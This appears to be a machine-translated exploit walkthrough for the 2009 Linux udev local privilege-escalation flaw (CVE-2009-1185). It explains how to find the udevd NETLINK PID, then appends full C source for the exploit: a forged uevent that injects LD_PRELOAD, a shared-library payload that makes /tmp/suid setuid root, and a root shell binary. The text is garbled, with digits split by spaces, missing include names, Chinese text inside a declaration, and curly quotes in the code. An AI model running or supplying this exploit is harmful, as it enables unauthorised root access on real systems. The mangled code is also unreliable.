Linux udev local vulnerabilities to elevate privileges.-vulnerability warning-the black bar safety net

Vulnerability description: since udev does not confirm the NETLINK message is derived from the kernel space, so it can be passed from the user space sends a NETLINK message so that a local user to obtain root privileges.
Specific information, please see: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-1185
Below we get into the combat demo:
!
This vulnerability is 2 0 0 9 year 4 month 2 day 0 in the milw0rm posted on, the EXP the author is Kcope, we directly use his EXP.
First, we need to first compile it EXP, according to the following figure for the format, you need to compile three files.
! secondly, to take advantage of this vulnerability, we must know the NETLINK Socket’s PID, there are two ways, first with“cat /proc/net/netlink“command to view, the second may use“ps-aux | grep "udevd"to get the udevd PID, but usually we need to the NETLINK Socket’s PID is the udevd PID minus 1. As shown below, here we have the NETLINK Socket’s PID is 2 2 1 0, and the udevd PID is 2 2 1 to 1.
! the best, let us use our compiled EXP to elevated it, put you get the NETLINK Socket’s PID as the first parameter, as shown in Figure, let us look at the effect:

You can see that we’ve successfully gained root access. over!
Appendix: EXP source code as follows
udev. c#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include

#ifndef NETLINK_KOBJECT_UEVENT
#define NETLINK_KOBJECT_UEVENT 1 5
#endif

#define SHORT_STRING 6 4
#define MEDIUM_STRING 1 2 8
#define BIG_STRING 2 5 6
#define LONG_STRING 1 0 2 4
#define EXTRALONG_STRING 4 0 9 6
#define TRUE 1
#define FALSE 0

int socket_fd;
struct sockaddr_nl address;
struct msghdr msg;
struct iovec结构包含待发送数据的緩冲区地址和长度 。 iovec iovector;
int sz = 6 4*1 0 2 4;

main(int argc, char **argv) {
char sysfspath[SHORT_STRING];
char subsystem[SHORT_STRING];
char event[SHORT_STRING];
char major[SHORT_STRING];
char minor[SHORT_STRING];

sprintf(event, “add”);
sprintf(subsystem, “block”);
sprintf(sysfspath, “/dev/foo”);
sprintf(major, “8”);
sprintf(minor, “1”);

memset(&address, 0, sizeof(address));
address. nl_family = AF_NETLINK;
address. nl_pid = atoi(argv[1]);
address. nl_groups = 0;

msg. msg_name = (void*)&address;
msg. msg_namelen = sizeof(address);
msg. msg_iov = &iovector;
msg. msg_iovlen = 1;

socket_fd = socket(AF_NETLINK, SOCK_DGRAM, NETLINK_KOBJECT_UEVENT);
bind(socket_fd, (struct sockaddr *) &address, sizeof(address));

char message[LONG_STRING];
char *mp;

mp = message;
mp += sprintf(mp, “%s@%s”, event, sysfspath) +1;
mp += sprintf(mp, “ACTION=%s”, event) +1;
mp += sprintf(mp, “DEVPATH=%s”, sysfspath) +1;
mp += sprintf(mp, “MAJOR=%s”, major) +1;
mp += sprintf(mp, “MINOR=%s”, minor) +1;
mp += sprintf(mp, “SUBSYSTEM=%s”, subsystem) +1;
mp += sprintf(mp, “LD_PRELOAD=/tmp/libno_ex. so. 1. 0”) +1;

iovector. iov_base = (void*)message;
iovector. iov_len = (int)(mp-message);

char *buf;
int buflen;
buf = (char *) & msg;
buflen = (int)(mp-message);

sendmsg(socket_fd, &msg, 0);

close(socket_fd);

sleep(1 0);
execl(“/tmp/suid”, “suid”, (void*)0);
}
program. c#include
#include
#include
#include

void _init()
{
setgid(0);
setuid(0);
unsetenv(“LD_PRELOAD”);
execl(“/bin/sh”,“sh”,“-c”,“chown root:root /tmp/suid; chmod +s /tmp/suid”,NULL);
}
suid. cint main(void) {
setgid(0); setuid(0);
execl(“/bin/sh”,“sh”,0); }